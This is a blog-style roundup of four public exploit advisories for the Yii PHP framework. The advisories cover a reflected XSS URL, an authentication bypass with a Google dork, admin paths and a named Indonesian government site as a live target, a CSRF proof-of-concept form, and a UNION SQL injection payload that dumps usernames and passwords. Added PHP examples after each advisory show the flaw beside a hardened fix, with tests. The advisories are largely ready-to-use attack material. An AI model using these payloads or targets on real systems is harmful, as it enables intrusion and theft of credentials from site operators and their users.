Yii Framework Vulnerability Roundup

Date: 2020-03-26
This article presents a Yii Framework vulnerability roundup. It mainly covers usage examples, application tips, a summary of the basic points, and things to watch out for; it has some reference value, and readers who need it may consult it.

1. Yii Framework 2.0.9 - Cross Site Scripting

# Exploit Title: Yii Framework 2.0.9 - Cross Site Scripting 
# Discovery Date: 2019-02-12 
# Exploit Author: Gionathan "John" Reale
# Vendor Homepage: https://www.yiiframework.com/
# Version: 2.0.9 
# CVE : CVE-2018-6010


In Yii Framework 2.x before 2.0.14, a reflected XSS vulnerability can be exploited from exception messages printed by the error handler in non-debug mode, related to base/ErrorHandler.php, log/Dispatcher.php, and views/errorHandler/exception.php.


Example:


http://fakewebsite.com/materiel/index?&MaterielTourModel[publication_date]=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3Cscript%3Ealert(%221%22)%3C/script%3E
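Added example (not Yii's own code and not part of the advisory): how a non-debug error page should treat exception text. `UserException`, `renderErrorVulnerable` and `renderErrorHardened` are stand-in names chosen here; `yii\base\UserException` is the real class whose messages Yii shows to end users, and `Html::encode()` is the real helper that does the encoding.

```php
<?php
declare(strict_types=1);

// Stand-in for yii\base\UserException: the only exception type whose message
// should ever reach an end user when debug mode is off.
final class UserException extends RuntimeException {}

// VULNERABLE pattern: the message is concatenated straight into HTML, so a
// request value echoed by the message (the advisory's publication_date value)
// is rendered as markup.
function renderErrorVulnerable(Throwable $e): string
{
    return '<div class="error"><h1>Error</h1><p>' . $e->getMessage() . '</p></div>';
}

// HARDENED pattern: internal exceptions get a generic text, and whatever is
// shown is encoded for the HTML body context (what Yii's Html::encode() does).
function renderErrorHardened(Throwable $e, bool $debug = false): string
{
    $message = ($debug || $e instanceof UserException)
        ? $e->getMessage()
        : 'An internal server error occurred.';
    $safe = htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<div class="error"><h1>Error</h1><p>' . $safe . '</p></div>';
}

// Constructed input modelled on the advisory's request: a validation error
// that repeats the submitted value inside its message.
$submitted  = 'AAAA<script>alert("1")</script>';
$userFacing = new UserException("Invalid publication date: $submitted");
$internal   = new RuntimeException('Connection failed for dsn=mysql:host=db;dbname=app'); // constructed

echo renderErrorVulnerable($userFacing), PHP_EOL; // contains a live <script> element
echo renderErrorHardened($userFacing), PHP_EOL;   // contains &lt;script&gt; instead

// Regression checks a project can keep in its test suite.
assert(strpos(renderErrorHardened($userFacing), '<script>') === false);
assert(strpos(renderErrorHardened($userFacing), '&lt;script&gt;') !== false);
assert(strpos(renderErrorHardened($internal), 'dsn=') === false);          // internal text hidden
assert(strpos(renderErrorHardened($internal, true), 'dsn=') !== false);    // debug mode shows it
```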

  

2. Powered by Yii Framework RBAC Manager for Yii 2 Improper Authentication Vulnerability

#################################################################################################

# Exploit Title : Powered by Yii Framework RBAC Manager for Yii 2 Improper Authentication Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/07/2018
# Vendor Homepage : yiiframework.com
# Tested On : Windows
# Software Download and Installation Links : packagist.org/packages/mdmsoft/yii2-admin ~ 
github.com/yii2mod/yii2-rbac ~ github.com/mdmsoft/yii2-admin
+ yiiframework.com/extension/rbac-manager  ~ yiiframework.com/extension/yii2-admin ~
+  travis-ci.org/mdmsoft/yii2-admin  ~ scrutinizer-ci.com/g/mdmsoft/yii2-admin/?branch=master
+ codeclimate.com/github/mdmsoft/yii2-admin
# Category : WebApps
# Versions : 2.x and 3.x
# Exploit Risk : Medium
# CWE : CWE-287 [ Improper Authentication ]

#################################################################################################

# Another Title : Powered by Yii Framework PHP Web Application Development Improper Authentication Vulnerability

Yii Framework yii2-admin RBAC Manager for Yii 2

GUI manager for RBAC (Role Based Access Control) Yii2. Easy to manage authorization of users.

Features of the Product [ Software ]

Manage RBAC System in intuitive Tree-View
Keep cool with recursion protection in RBAC Tree
Generate PHP Code
Full relational move, create, edit, delete support of RBAC Tree items.
Assign and eject multiple Roles to and from multiple Users
Create predefined business Rules for User Assignments
Assign Roles in Secure Mode
By Controller protected and not changeable Roles and Assignments
Use easy checkAccess() methods in your Controller
Create easy bizRule Code in your RBAC Roles and Assignments

################################################################################################

# Description for Improper Authentication Vulnerability [ CWE-287 ]

+ When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.

+ If software incorrectly validates user logon information or allows different techniques of malicious credential gathering 
(e.g. brute force, spoofing, or changing URL links without giving a username and password), an attacker can gain certain privileges 
within the application or disclose sensitive information.

+ If the parameter is equal to "user", the application allows viewing the information; if it is equal to "admin", then it is possible to edit information on the page.

+ If an attacker changes the value of the "group" parameter to "admin", he will be able to modify the page.

+ The Powered by Yii Framework RBAC Manager for Yii 2 vulnerability results from software misconfiguration.

+ The attacker might be able to gain unauthorized access to the application and otherwise restricted areas and perform certain actions, e.g. disclose sensitive information, alter the application, or even execute arbitrary code.

+ An attacker can use a variety of vectors to exploit this weakness, including brute-force, session fixation, and Man-in-the-Middle (MitM) attacks.

Reference [ Short Explained by me ] => CWE-287: Improper Authentication [cwe.mitre.org]

#################################################################################################

# Google Dork  : inurl:''/emusrenbang/web/index.php?r=''

# Administration Login Panel => /emusrenbang/web/index.php?r=site%2Flogin

# Exploit : No Username. No Password. No Need for Login Credentials. The web application does not require login. 

Just enter this path after the site URL.

/emusrenbang/web/index.php?r=admin

Whatever you enter as an exploit, such as [ anything' OR 'x'='x ] or [ '=''or' ] and many others used as SQL authentication bypasses, 

it always says '' Incorrect username or password. '' But we will jump over the admin door wall. 

This is called an Improper Authentication Vulnerability.

127.0.0.1/emusrenbang/web/index.php?r=site%2Flogin => [ Proof of Concept ] =>  archive.is/BLaE5

127.0.0.1/emusrenbang/web/index.php?r=admin  => [ Proof of Concept ] => archive.is/D9dKP

Useable Admin Control Panel URL Links => 

/emusrenbang/web/index.php?r=admin
/emusrenbang/web/index.php?r=admin%2Fassignment
/emusrenbang/web/index.php?r=admin%2Frole
/emusrenbang/web/index.php?r=admin%2Fpermission
/emusrenbang/web/index.php?r=admin%2Froute
/emusrenbang/web/index.php?r=admin%2Frule
/emusrenbang/web/index.php?r=admin%2Fmenu
/emusrenbang/web/index.php?r=admin%2Fdefault%2Findex

#################################################################################################

The Indonesian government site [ Bappeda Provinsi Sumatera Utara 2016 ] is the only vulnerable website.

# Example Site => eplanning.sumutprov.go.id/emusrenbang/web/index.php?r=admin%2Fmenu 

# [ Proof of Concept ] => archive.is/lCRem

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################
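Added example (not the yii2-admin project's own code and not from the advisory): a `config/web.php` fragment that leaves the admin module open beside one that gates every `admin/*` route behind login plus an RBAC check, using Yii 2's core `yii\filters\AccessControl` filter. The role name `admin` and the identity class `app\models\User` are assumptions.

```php
<?php
// WEAK: the admin module is registered with no access filter, so every
// admin/* route listed in the advisory (assignment, role, permission, rule,
// menu, ...) is served to unauthenticated visitors.
$weak = [
    'modules' => [
        'admin' => ['class' => 'mdm\admin\Module'],
    ],
];

// HARDENED: attach Yii 2's core AccessControl filter to the module with the
// "as <name>" behavior syntax. An ActionFilter attached to a module runs
// before every action of every controller inside that module.
$hardened = [
    'modules' => [
        'admin' => [
            'class' => 'mdm\admin\Module',
            'as access' => [
                'class' => 'yii\filters\AccessControl',
                'rules' => [
                    [
                        'allow' => true,
                        // '?' = guest, '@' = any logged-in user; any other name
                        // is an RBAC role/permission that AccessRule checks via
                        // Yii::$app->user->can(). 'admin' is an assumed role name.
                        'roles' => ['admin'],
                    ],
                ],
                // No matching rule means deny: guests are redirected to
                // user.loginUrl, logged-in users without the role receive a 403.
            ],
        ],
    ],
    'components' => [
        // RBAC items must be stored somewhere for user->can() to consult.
        'authManager' => ['class' => 'yii\rbac\DbManager'],
        'user' => [
            'identityClass' => 'app\models\User', // assumed identity class
            'loginUrl' => ['site/login'],
        ],
    ],
];

return $hardened;
```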

  

3. Yii Framework Blog Cross Site Request Forgery

# Exploit Title: Yii Framework Blog Application CSRF Vulnerability
# Date: 3 Mar 2014
# Author: Christy Philip Mathew
# Demo: Yii Blog Application - http://www.yiiframework.com/demos/blog/
# Category: web
# Tested on: Windows 8

An attacker will be able to create a post.

<html>
  <body>
    <form action="http://www.yiiframework.com/demos/blog/index.php/post/create" method="POST">
      <input type="hidden" name="Post[title]" value="test" />
      <input type="hidden" name="Post[content]" value="test" />
      <input type="hidden" name="Post[tags]" value="test" />
      <input type="hidden" name="Post[status]" value="2" />
      <input type="hidden" name="yt0" value="Create" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
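Added example (not the Yii blog demo's code): the synchronizer-token check that makes a forged form like the one above fail, written as a framework-independent sketch. Yii 1.1 provides the same protection through its request component (`'enableCsrfValidation' => true`) and `CHtml::beginForm()`, which emits the `YII_CSRF_TOKEN` hidden field; the function names and the `$session` array standing in for a PHP session are assumptions.

```php
<?php
declare(strict_types=1);

const CSRF_FIELD = 'YII_CSRF_TOKEN'; // the field name Yii 1.1 uses

// Issue one random secret per session and keep it server-side.
function csrfToken(array &$session): string
{
    if (!isset($session[CSRF_FIELD])) {
        $session[CSRF_FIELD] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_FIELD];
}

// Every legitimate form embeds the token; a page on another origin cannot
// read it, so it cannot reproduce it in a forged submission.
function renderCreateForm(array &$session): string
{
    $token = htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8');
    return '<form action="/index.php/post/create" method="POST">'
         . '<input type="hidden" name="' . CSRF_FIELD . '" value="' . $token . '" />'
         . '<input name="Post[title]" /><input type="submit" name="yt0" value="Create" />'
         . '</form>';
}

// Check on every state-changing request, before the model is touched.
function isCsrfValid(string $method, array $post, array $session): bool
{
    if (in_array($method, ['GET', 'HEAD', 'OPTIONS'], true)) {
        return true; // safe methods carry no token
    }
    $expected = $session[CSRF_FIELD] ?? '';
    $given    = $post[CSRF_FIELD] ?? '';
    // fail closed on a missing token; hash_equals avoids timing leaks
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Constructed requests: the forged one carries exactly the fields of the
// advisory's form; the legitimate one came from renderCreateForm().
$session = [];
echo renderCreateForm($session), PHP_EOL;
$forged = [
    'Post' => ['title' => 'test', 'content' => 'test', 'tags' => 'test', 'status' => '2'],
    'yt0'  => 'Create',
];
$legit = $forged + [CSRF_FIELD => csrfToken($session)];

assert(isCsrfValid('POST', $forged, $session) === false); // rejected: no token
assert(isCsrfValid('POST', $legit, $session) === true);   // accepted
assert(isCsrfValid('POST', $legit, []) === false);        // no session secret: rejected
```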

  

4. Yii Framework Search SQL Injection Vulnerability

# Exploit Title: Yii Framework - Search SQL Injection Vulnerability
# Google Dork: No Dork
# Date: 20/11/2012
# Exploit Author: Juno_okyo
# Vendor Homepage: http://www.yiiframework.com/
# Software Link: http://www.yiiframework.com/download/
# Version: 1.1.8 (maybe another version)
#
####
Vulnerability:
##################################
 
SQL Injection via the search form. You can query it to get some info about the
administrator account and more...
 
##################################
Exploitation:
##################################
 
' UNION SELECT
1,group_concat(username,0x7c,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
fRom user-- -
 
##################################
More Details:
##################################
 
Website: http://junookyo.blogspot.com/
About Exploit:
http://junookyo.blogspot.com/2012/11/yii-framework-search-sql-injection.html
 

##################################
Great thanks to Juno_okyo and James - J2TeaM
##################################
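Added example (not from the advisory and not Yii's code): a search built by string concatenation beside the parameterised form, run against an in-memory SQLite database with constructed rows so the difference is observable offline. The function names, table layout and the payload's column count (adjusted to this two-column query) are assumptions.

```php
<?php
declare(strict_types=1);

// In-memory database with constructed rows (the password value is a placeholder).
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE post (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec('CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$pdo->exec("INSERT INTO post (title) VALUES ('Hello Yii'), ('Second post')");
$pdo->exec("INSERT INTO user (username, password) VALUES ('admin', '<hash placeholder>')");

// VULNERABLE: the keyword is interpolated into the statement, so a single
// quote closes the string literal and the rest of the input becomes SQL.
function searchVulnerable(PDO $pdo, string $q): array
{
    $sql = "SELECT id, title FROM post WHERE title LIKE '%$q%'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: the keyword is a bound parameter and can only ever be data.
// Yii 1.1's CDbCriteria::compare()/addSearchCondition() and Yii 2's query
// builder bind parameters the same way; never assemble WHERE by hand.
function searchHardened(PDO $pdo, string $q): array
{
    // also escape LIKE wildcards so '%' and '_' typed by a user match literally
    $pattern = '%' . addcslashes($q, '%_\\') . '%';
    $stmt = $pdo->prepare("SELECT id, title FROM post WHERE title LIKE :q ESCAPE '\\'");
    $stmt->execute([':q' => $pattern]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed input in the shape of the advisory's payload, with the column
// count matched to this two-column query and SQLite syntax for the separator.
$payload = "' UNION SELECT 1, username || '|' || password FROM user-- -";

$leaked = searchVulnerable($pdo, $payload); // post rows plus a row from the user table
$clean  = searchHardened($pdo, $payload);   // no title contains the payload text

assert(in_array('admin|<hash placeholder>', array_column($leaked, 'title'), true));
assert($clean === []);
```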

  


Original source: https://www.cnblogs.com/junsec/p/12574932.html